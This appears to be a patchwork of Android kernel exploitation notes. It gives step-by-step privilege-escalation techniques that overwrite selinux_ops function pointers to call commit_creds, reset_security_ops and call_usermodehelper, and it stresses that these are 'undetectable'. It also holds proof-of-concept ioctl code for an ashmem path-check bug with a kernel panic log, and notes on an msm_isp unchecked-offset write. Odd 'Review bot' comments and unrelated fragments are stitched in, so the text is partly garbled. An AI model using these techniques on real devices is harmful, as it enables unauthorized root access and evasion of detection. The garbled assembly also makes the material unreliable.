
Proposing new kernel attack technique

Proposing new kernel attack technique

1.Search for callable function inside FPT structure (ptmx, securityops, defaultsecurity_ops)

2.User input has to be transferred without modification (intact) // 用户输入不能被修改,必须被完整的输入。

Select function pointer(within kernel) to call without ROP

1.taskprctl function pointer from selinuxops meets all criteria

2.user inputs were passed though without modification


SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
  unsigned long, arg4, unsigned long, arg5)
 struct task_struct *me = current;
 struct task_struct *tsk;
 unsigned char comm[sizeof(me->comm)];
 long error;

 error = security_task_prctl(option, arg2, arg3, arg4, arg5);
 if (error != -ENOSYS)
  return error;

 error = 0;

PXN bypass attack without ROP

When only a partial memory value can be increased/decreased

CVE-2013-2094 perfeventopen

1.call resetsecurityops by increasing address of captaskprctl

2.call commit_creds

Direction Type Address                         Text                        
--------- ---- -------                         ----                        
Up        p    ____call_usermodehelper+130     BL              commit_creds
Up        p    set_current_groups+38           BL              commit_creds
Up        p    install_exec_creds+20           BL              commit_creds
Up        p    keyctl_change_reqkey_auth+50    BL              commit_creds
Up        p    keyctl_set_reqkey_keyring+98    BL              commit_creds
Up        p    join_session_keyring+90         BL              commit_creds
Up        p    join_session_keyring+118        BL              commit_creds
Up        p    lookup_user_key:loc_C0390D70    BL              commit_creds
Up        p    lookup_user_key+420             BL              commit_creds
Up        p    key_replace_session_keyring+1A0 BL              commit_creds
          p    cap_task_prctl+198              BL              commit_creds
Down      p    selinux_setprocattr+120         BL              commit_creds

int cap_task_prctl(int option, unsigned long arg2, unsigned long arg3,
     unsigned long arg4, unsigned long arg5)
 struct cred *new;
 long error = 0;

 new = prepare_creds();

 return commit_creds(new);

ROM:C0393754 cap_task_prctl
ROM:C0393754                 MOV             R12, SP
ROM:C0393758                 STMFD           SP!, {R3-R6,R11,R12,LR,PC}
ROM:C03938E8                 MOV             R0, R5
ROM:C03938EC                 BL              commit_creds

When we have total control over memory

CVE-2014-3153 futexrequeue CVE-2013-6282 get/putuser CVE-2015-0815 pipe

Change the value of taskprctl within selinuxops to kernel function address we want to call

1.Turn off SEAndroid and call commitcreds after calling preparekernel_cred

// change task_prctl within selinux_ops to address of reset_security_ops
syscall(172); /* 172 = sys_prctl *//* reset_security_ops() call */
// change task_prctl within selinux_ops to address of prepare_kernel_cred
cred_addr=syscall(172, 0); /* prepare_kernel_cred(0) call */
// change task_prctl within selinux_ops to address of commit_creds
syscall(172,cred_addr); /* commit_creds(cred_addr) call */

2.Calling taskprctl after overwriting its value to the address of commitcreds

// change task_prctl within selinux_ops to address of commit_creds
// we don’t need to call prepare_kernel_cred if we provide init_cred address as a parameter

3.We can indirectly call overridecreds function by calling taskprctl

// change task_prctl within selinux_ops to address of override_creds
void *cred_ptr=(void *)mmap(0x80000,0x100,...);
*(long *)&cred_ptr[0]=cred_addr;

kernel thread command execution

call_usermodehelper API

/*
 * Thin wrapper over call_usermodehelper_fns(): forwards @path, @argv,
 * @envp and @wait unchanged and supplies no init callback, no cleanup
 * callback and no private data.
 * Returns whatever call_usermodehelper_fns() returns.
 *
 * NOTE(review): nothing here validates @path; the caller alone decides
 * what gets executed, so @path must never be derived from untrusted input.
 */
static inline int
call_usermodehelper(char *path, char **argv, char **envp, int wait)
 return call_usermodehelper_fns(path, argv, envp, wait,
           NULL, NULL, NULL);

/*
 * Build a subprocess_info for @path/@argv/@envp, attach the optional
 * @init/@cleanup callbacks and @data to it, and submit it through
 * call_usermodehelper_exec().
 *
 * Returns -ENOMEM when call_usermodehelper_setup() fails; otherwise the
 * result of call_usermodehelper_exec().
 *
 * NOTE(review): nothing in this function validates @path, @argv or @envp;
 * whoever reaches this call decides what gets executed, so callers must
 * never build these from untrusted input.
 */
static inline int
call_usermodehelper_fns(char *path, char **argv, char **envp, int wait,
   int (*init)(struct subprocess_info *info, struct cred *new),
   void (*cleanup)(struct subprocess_info *), void *data)
 struct subprocess_info *info;
 /* GFP_ATOMIC only for the no-wait case -- presumably because such a
  * caller may be in a context that cannot sleep; confirm against callers. */
 gfp_t gfp_mask = (wait == UMH_NO_WAIT) ? GFP_ATOMIC : GFP_KERNEL;

 // Set the argument, environment variables, handlers to run within kernel memory
 info = call_usermodehelper_setup(path, argv, envp, gfp_mask);

 /* Allocation failure is the only error reported directly from here. */
 if (info == NULL)
  return -ENOMEM;

 call_usermodehelper_setfns(info, init, cleanup, data);

 //  Register sub_info->work to khelper_wq queue
 return call_usermodehelper_exec(info, wait);

struct subprocess_info *call_usermodehelper_setup(char *path, char **argv,
        char **envp, gfp_t gfp_mask)
 INIT_WORK(&sub_info->work, __call_usermodehelper);

static void __call_usermodehelper(struct work_struct *work)
 if (wait == UMH_WAIT_PROC)
  pid = kernel_thread(wait_for_helper, sub_info,
  pid = kernel_thread(____call_usermodehelper, sub_info,

static int ____call_usermodehelper(void *data)
 retval = kernel_execve(sub_info->path,
          (const char *const *)sub_info->argv,
          (const char *const *)sub_info->envp);

// call do_execve function and execute user application
int kernel_execve(const char *filename,
    const char *const argv[],
    const char *const envp[])
 ret = do_execve(filename,
   (const char __user *const __user *)argv,
   (const char __user *const __user *)envp, &regs);

Bypassing PXN by calling call_usermodehelper

1.search for captaskprctl table address from security_ops structure

2.change captaskprctl value to resetsecurityops’s address

3.first calling prctl function will turn off SEAndroid

4.change captaskprctl value to call_usermodehelper’s address

5.second calling prctl function will run kernel thread command with admin priv

6.it runs as child process of kworker -> UNDETECTABLE

Kernel Protection bypass

use codes that indirectly call call_usermodehelper APIs

static int call_modprobe(char *module_name, int wait)
 static char *envp[] = {

 char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
 if (!argv)
  goto out;

 module_name = kstrdup(module_name, GFP_KERNEL);
 if (!module_name)
  goto free_argv;

 argv[0] = modprobe_path;
 argv[1] = "-q";
 argv[2] = "--";
 argv[3] = module_name; /* check free_modprobe_argv() */
 argv[4] = NULL;

 return call_usermodehelper_fns(modprobe_path, argv, envp,
  wait | UMH_KILLABLE, NULL, free_modprobe_argv, NULL);
 return -ENOMEM;

int orderly_poweroff(bool force)
 int argc;
 char **argv = argv_split(GFP_ATOMIC, poweroff_cmd, &argc);
 static char *envp[] = {
 info = call_usermodehelper_setup(argv[0], argv, envp, GFP_ATOMIC);
 if (info == NULL) {
  goto out;

 call_usermodehelper_setfns(info, NULL, argv_cleanup, NULL);

 ret = call_usermodehelper_exec(info, UMH_NO_WAIT);



Bypassing kernel protection by calling call_usermodehelper without parameters

1.orderly_poweroff seems to work pretty well

2.Bypassing kernel protection by calling call_usermodehelper indirectly

3.Change poweroff_cmd variable value to location of variable we want to run

4.Turn off SEAndroid and change whatever FPT to address of orderly_poweroff

5.At calling prctl, desired process will run as admin in kernel thread

6.it runs as child process of kworker -> UNDETECTABLE

the easiest kernel protection bypass

Bypassing kernel protection by overwriting uevent_helper

1.The hotplug helper is run automatically by the kobject_uevent_env function

2.we can execute commands by overwriting uevent_helper without changing ops structure

int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
         char *envp_ext[])
 // uevent_helper = CONFIG_UEVENT_HELPER_PATH = "/sbin/hotplug"
 argv [0] = uevent_helper;
 argv [1] = (char *)subsystem;
 argv [2] = NULL;
 retval = call_usermodehelper(argv[0], argv,
          env->envp, UMH_WAIT_EXEC);



About a month ago, while looking at the Android kernel source code, I found a strange piece of logic that can crash the device by bypassing the detection logic. I tested it on a Nexus 4 with security patch level 20161005.



Illegal access caused by an empty list. This problem has not been fixed; I only tested it on a Nexus 4 and Nexus 5 with security patch level 20161005. It causes a kernel panic.

static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
 const char __user *ubuf, size_t cnt, loff_t *ppos)
 list_for_each_entry(cldata, &cl_list, list) {
  if (strstr(chid, cldata->pdata->name)) {
   cldata = cldata;
   strsep(&chid, " ");
   if (chid) {
    ret = strict_strtoul(chid, 10, &index);
    if (ret) {
     MSM_BUS_DBG("Index conversion"
      " failed\n");
     return -EFAULT;
   } else
    MSM_BUS_DBG("Error parsing input. Index not"
     " found\n");

 msm_bus_dbg_update_request(cldata, index);
 return cnt;




Linux内核 >= 2.6.22(2007年发行)以后的版本都受到影响,同时影响到android系统。





 static int is_ashmem_file(struct file *file)
-   char fname[256], *name;
-   name = dentry_path(file->f_dentry, fname, 256);
-   return strcmp(name, "/ashmem") ? 0 : 1;
+   return (file->f_op == &ashmem_fops);
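Review bot: The new identity check `file->f_op == &ashmem_fops` should carry a comment saying why it replaces the name comparison, because the reasoning is invisible in the function itself: `dentry_path()` returns a path relative to the file's mount point, so the old `strcmp(name, "/ashmem")` could be satisfied by a same-named file on a different mount, whereas the file_operations pointer identifies the driver that opened the file regardless of name or mount. Suggested: `/* Compare file_operations identity, not the mount-relative path: any same-named file on another mount would match the old check */`. Whether `ashmem_fops` is declared in this translation unit cannot be judged from the hunk. is_ashmem_file is shown without its braces, so its full extent lies outside the hunk.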

dentry_path: 获取文件全路径,相对挂载点

shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0


data, system, proc, /mnt/obb
/data/ashmem :  /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem


fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[  269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[  269.003276] pgd = e9f24000
[  269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[  269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[  269.020398] CPU: 0    Not tainted  (3.4.0-gd59db4e #1)
[  269.020506] PC is at get_ashmem_file+0x78/0x154
[  269.020676] LR is at is_ashmem_file+0x3c/0x68
[  269.020772] pc : [<c078e704>]    lr : [<c078df24>]    psr: 20000013
[  269.020776] sp : eb73ddb8  ip : eb73dc98  fp : eb73de1c
[  269.021027] r10: 00000004  r9 : c10e9008  r8 : eb73de5c
[  269.021196] r7 : eb73de58  r6 : eb73de54  r5 : c103a488  r4 : ebbc9240
[  269.021291] r3 : 19761abc  r2 : 00000000  r1 : c0deb698  r0 : 00000000
[  269.021464] Flags: nzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  269.021560] Control: 10c5787d  Table: 3232406a  DAC: 00000015
[  269.021729]
[  269.021731] PC: 0xc078e684:
[  269.021906] e684  c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[  269.022856] e6a4  e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[  269.023810] e6c4  e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[  269.024684] e6e4  1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[  269.025645] e704  e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[  269.026609] e724  e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[  269.027563] e744  e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[  269.028451] e764  e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[  269.029408]
[  269.029411] LR: 0xc078dea4:
[  269.029585] dea4  e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[  269.030541] dec4  e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[  269.031501] dee4  e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[  269.032466] df04  e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[  269.033348] df24  e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[  269.034303] df44  ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[  269.035262] df64  e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[  269.036153] df84  e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[  269.037106]
[  269.037108] SP: 0xeb73dd38:
[  269.037357] dd38  ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[  269.038229] dd58  c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[  269.039179] dd78  00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[  269.040129] dd98  00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[  269.041004] ddb8  000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[  269.041953] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.042829] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.043775] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.044652]
[  269.044654] IP: 0xeb73dc18:
[  269.044901] dc18  ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[  269.045780] dc38  00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[  269.046749] dc58  eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[  269.047633] dc78  eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[  269.048594] dc98  00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[  269.049476] dcb8  00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[  269.050434] dcd8  c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[  269.051397] dcf8  eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[  269.052351]
[  269.052353] FP: 0xeb73dd9c:
[  269.052527] dd9c  eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[  269.053480] ddbc  c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[  269.054363] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.055324] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.056282] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.057240] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.058119] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.059070] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.060026]
[  269.060029] R1: 0xc0deb618:
[  269.060202] b618  613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[  269.061160] b638  002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[  269.062118] b658  6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[  269.063000] b678  613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[  269.063958] b698  613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[  269.064909] b6b8  66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[  269.065797] b6d8  73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[  269.066754] b6f8  66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[  269.067710]
[  269.067713] R4: 0xebbc91c0:
[  269.067888] 91c0  00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[  269.068842] 91e0  00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[  269.069803] 9200  ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[  269.070680] 9220  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.071635] 9240  ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[  269.072584] 9260  00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[  269.073465] 9280  00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[  269.074334] 92a0  00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[  269.075298]
[  269.075301] R5: 0xc103a408:
[  269.075477] a408  0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[  269.076437] a428  31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[  269.077396] a448  a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[  269.078270] a468  db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[  269.079152] a488  19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[  269.080109] a4a8  c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[  269.081061] a4c8  c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[  269.082008] a4e8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.082886]
[  269.082888] R6: 0xeb73ddd4:
[  269.083137] ddd4  c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[  269.084019] ddf4  eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[  269.084972] de14  eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[  269.085926] de34  14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[  269.086876] de54  ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[  269.087752] de74  c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[  269.088711] de94  00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[  269.089669] deb4  00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[  269.090551]
[  269.090554] R7: 0xeb73ddd8:
[  269.090803] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.091762] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.092645] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.093604] de38  00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[  269.094559] de58  00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[  269.095443] de78  eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[  269.096406] de98  00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[  269.097364] deb8  eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[  269.098314]
[  269.098316] R8: 0xeb73dddc:
[  269.098492] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.099442] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.100320] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.101272] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.102229] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.103183] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.104066] de9c  00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[  269.105015] debc  eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[  269.105967]
[  269.105969] R9: 0xc10e8f88:
[  269.106145] 8f88  0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[  269.107094] 8fa8  c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[  269.108046] 8fc8  c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[  269.108925] 8fe8  0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[  269.109881] 9008  c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[  269.110837] 9028  c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[  269.111798] 9048  000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[  269.112684] 9068  c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[  269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[  269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[  269.113841] dda0:                                                       000080d0 c04aad10
[  269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[  269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[  269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[  269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[  269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[  269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[  269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[  269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[  269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[  269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[  269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[  269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[  269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[  269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[  269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[  269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[  269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[  269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[  269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[  269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[  269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[  269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[  269.121735] ---[ end trace 032dae055767b39f ]---
[  269.121877] Kernel panic - not syncing: Fatal exception
[  270.122308] Rebooting in 5 seconds..
[  275.123947] Going down for restart now
[  275.124870] Calling SCM to disable SPMI PMIC arbiter




diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
index 8e7cb68..86392c6 100644
--- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
@@ -1234,7 +1234,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
    case VFE_READ_DMI_16BIT:
    case VFE_READ_DMI_32BIT:
    case VFE_READ_DMI_64BIT: {
-       if (reg_cfg_cmd.cmd_type == VFE_WRITE_DMI_64BIT) {
+       if (reg_cfg_cmd.cmd_type == VFE_WRITE_DMI_64BIT ||
+           reg_cfg_cmd.cmd_type == VFE_READ_DMI_64BIT) {
            if ((reg_cfg_cmd.u.dmi_info.hi_tbl_offset <=
                reg_cfg_cmd.u.dmi_info.lo_tbl_offset) ||
                (reg_cfg_cmd.u.dmi_info.hi_tbl_offset -
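Review bot: Listing VFE_READ_DMI_64BIT alongside VFE_WRITE_DMI_64BIT routes the read case through the hi_tbl_offset check, but the visible part of that check only relates hi_tbl_offset to lo_tbl_offset and the rest of the condition lies outside the hunk; unless the remaining terms also bound `hi_tbl_offset + len` against `cmd_len` with the same `UINT_MAX - len` overflow guard that the lo_tbl_offset check shown later on this page uses, the read path can still derive its table pointer from an offset that is never compared with the buffer length. Since one guard now serves a write and a read case, a comment such as `/* hi_tbl_offset indexes cfg_data on both the 64-bit write and read paths, so it must be bounded by cmd_len exactly like lo_tbl_offset */` would record why both command types are listed. The hunk also accesses `reg_cfg_cmd.u` by value while the listing below this diff uses `reg_cfg_cmd->u`, which presumably reflects a different kernel revision rather than an error. msm_isp_send_hw_cmd begins and ends outside the hunk.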

source code

static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
    struct msm_vfe_reg_cfg_cmd *reg_cfg_cmd,
    uint32_t *cfg_data, uint32_t cmd_len)
    case VFE_READ_DMI_64BIT: {
        if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
            // check param...
        // check lo_tbl_offset
        if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset >
            (UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) ||
            ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
            reg_cfg_cmd->u.dmi_info.len) > cmd_len)) {
            pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n",
                __func__, __LINE__,
                reg_cfg_cmd->u.dmi_info.len, cmd_len);
            return -EINVAL;
    case VFE_READ_DMI_64BIT: {
        int i;
        uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
        uint32_t hi_val, lo_val, lo_val1;
        if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
            hi_tbl_ptr = cfg_data +
        lo_tbl_ptr = cfg_data +
        if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT)
            reg_cfg_cmd->u.dmi_info.len =
                reg_cfg_cmd->u.dmi_info.len / 2;
        for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
            lo_val = msm_camera_io_r(vfe_dev->vfe_base +
                    vfe_dev->hw_info->dmi_reg_offset + 0x4);
            if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_16BIT) {
                lo_val1 = msm_camera_io_r(vfe_dev->vfe_base +
                    vfe_dev->hw_info->dmi_reg_offset + 0x4);
                lo_val |= lo_val1 << 16;
            *lo_tbl_ptr++ = lo_val;
            if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
                hi_val = msm_camera_io_r(vfe_dev->vfe_base +
                *hi_tbl_ptr = hi_val;    // !!!! hi_tbl_offset not check, so hi_tbl_ptr can be control~
                hi_tbl_ptr += 2;



need pass check:

if (
         ( reg_cfg_cmd[0].u.dmi_info.lo_tbl_offset > (UINT_MAX - reg_cfg_cmd[0].u.dmi_info.len) )
